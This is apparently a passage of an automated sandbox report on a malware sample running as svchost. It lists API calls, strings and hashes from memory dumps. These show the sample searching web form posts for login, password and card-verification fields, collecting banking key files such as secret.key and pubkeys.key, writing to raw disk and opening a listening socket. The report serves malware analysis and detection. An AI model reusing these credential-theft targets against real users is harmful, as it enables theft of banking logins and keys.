                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                                • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                                • API String ID: 2246752426-2295261572
                                                                                                                                                                                                                • Opcode ID: 36e8d765793c57efd28a0b87345c34c153d049a896611a3a999649836eea5e61
                                                                                                                                                                                                                • Instruction ID: d08d8d2f7da387c731888194a9b3b5105c60de4fc3fd2da1127c0567850c4d55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e8d765793c57efd28a0b87345c34c153d049a896611a3a999649836eea5e61
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4A14873A4021A9FDB21CB24CC54FEA7775EF85304F1486D4EB899B180E771AA49CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC323D
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 02BC325E
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC327F
                                                                                                                                                                                                                • GetGUIThreadInfo.USER32(00000000), ref: 02BC3286
                                                                                                                                                                                                                • GetOpenClipboardWindow.USER32 ref: 02BC329C
                                                                                                                                                                                                                • GetActiveWindow.USER32 ref: 02BC32AA
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02BC32D8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02BC32FA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC3301
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC3311
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02BC332E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC337B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC337E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC338B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC338E
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02BC3399
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02BC33DF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 3472172748-4108050209
                                                                                                                                                                                                                • Opcode ID: ce771464a92efe3e0ea6eb021d9978e93016318daa225127e5b72e7337e90ee6
                                                                                                                                                                                                                • Instruction ID: 2e0d8ccb9017695ace6d1db410fb8df522b4afeb8221c5ebe70c673978bece36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce771464a92efe3e0ea6eb021d9978e93016318daa225127e5b72e7337e90ee6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF513431604302ABD7209B689C4CF6B7BE8EFC6754FA0879CFA8597280DF20D90487A5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocfree$exit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 337157181-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC3411
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3428
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3438
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3465
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02BC3487
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,75569300), ref: 02BC34B1
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34C0
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02BC34D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34EA
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC3507
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC3518
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                                • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                                • API String ID: 649538874-3292898883
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02BDDB7A
                                                                                                                                                                                                                • strchr.MSVCRT ref: 02BDDB89
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02BDDC75
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 02BDDC89
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                                • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                                • API String ID: 23527507-2295261572
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                • API String ID: 731831024-2333288578
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BE1278
                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02BE128E
                                                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 02BE12A8
                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 02BE12B3
                                                                                                                                                                                                                • bind.WS2_32(00000000,?,00000010), ref: 02BE12CB
                                                                                                                                                                                                                • listen.WS2_32(00000000,00000005), ref: 02BE12D8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4126956815-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD2B5E
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2B83
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02BD2B95
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileModuleNamememset
                                                                                                                                                                                                                • String ID: \clmain.exe
                                                                                                                                                                                                                • API String ID: 350293641-582869414
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BDE119
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 02BDE15E
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 02BDE1D2
                                                                                                                                                                                                                • free.MSVCRT ref: 02BDE1FF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2496910992-0
                                                                                                                                                                                                                • Opcode ID: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                                • Instruction ID: c262819e331132623780e9ae66b8ffa9f7cc74b06a9afbe8a6b774b1ad754ced
                                                                                                                                                                                                                • Opcode Fuzzy Hash: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F331497270025E8FDB10CEA8E8847EE7B64EB45351F1406E2EA458B201F731C656CBA2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0830
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d727a), ref: 02BD0857
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD0895
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD089F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD08A7
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD08B9
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD08C0
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD08FC
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BD090A
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d727a,?,?), ref: 02BD0945
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD097F
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD0989
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD0991
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD09A0
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD09A7
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BD09D5
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD0A00
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0A4B
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02BD0A65
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0AA8
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0AC2
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,02BFA5BC,00000002,?,?,?), ref: 02BD0AE7
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0B2A
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0B44
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0B69
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BA1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0BA4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BB0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0BB3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02BD0BC0
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD0BE6
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02BD0C08
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02BD0C23
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?), ref: 02BD0C2E
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?), ref: 02BD0C39
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02BD0C40
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02BD0C50
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD0C62
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0C8F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0C92
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0C9F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CA2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0CAB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0CAE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02BD0CBF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CC2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                                • String ID: 617d727a$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Wu$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                                • API String ID: 1233543684-2550566778
                                                                                                                                                                                                                • Opcode ID: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                                • Instruction ID: 36bf51d71861ff7cf7ff5a967bd0355aacfd5a82aa4294e23af7c989d0724e21
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04D10170944341AFE760AB74D888FAB7BE8EF89744F444E98F68587140EB74D518CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC89F2
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,02BC0BE3), ref: 02BC8A0F
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,02BC0BE3,?,?,?), ref: 02BC8A35
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,7556F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44DC
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44EF
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD4502
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4528
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4562
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD45CD
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: GetLastError.KERNEL32 ref: 02BD45D7
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02BC8A5C
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02BC8A6C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA,?,?,?,?,?,?), ref: 02BC8A9D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617D73CA,?,?,?,?,?,?), ref: 02BC8AAB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8AB8
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA,?,?,?,?,?,?), ref: 02BC8ABF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02BC8B2E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d73f8,?,?,?,?,?,?), ref: 02BC8B5D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617d73f8,?,?,?,?,?,?), ref: 02BC8B6B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8B78
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d73f8,?,?,?,?,?,?), ref: 02BC8B7F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02BC8BF3
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02BC8C03
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02BC8C13
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D731E,?,?,?,?,?,?), ref: 02BC8C3D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617D731E,?,?,?,?,?,?), ref: 02BC8C4B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8C58
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D731E,?,?,?,?,?,?), ref: 02BC8C5F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02BC8CCF
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4,?,?,?,?,?,?), ref: 02BC8CFD
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617d72c4,?,?,?,?,?,?), ref: 02BC8D0B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8D18
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4,?,?,?,?,?,?), ref: 02BC8D1F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02BC8D93
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242,?,?,?,?,?,?), ref: 02BC8DBD
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617d7242,?,?,?,?,?,?), ref: 02BC8DCB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242,?,?,?,?,?,?), ref: 02BC8DD6
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02BC8E43
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E6D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,02C0CF94,?,?,?,?,?,?), ref: 02BC8E7B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E86
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3570,00000000,00000000,00000000), ref: 02BC8EE8
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BC8F00
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BC8F11
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
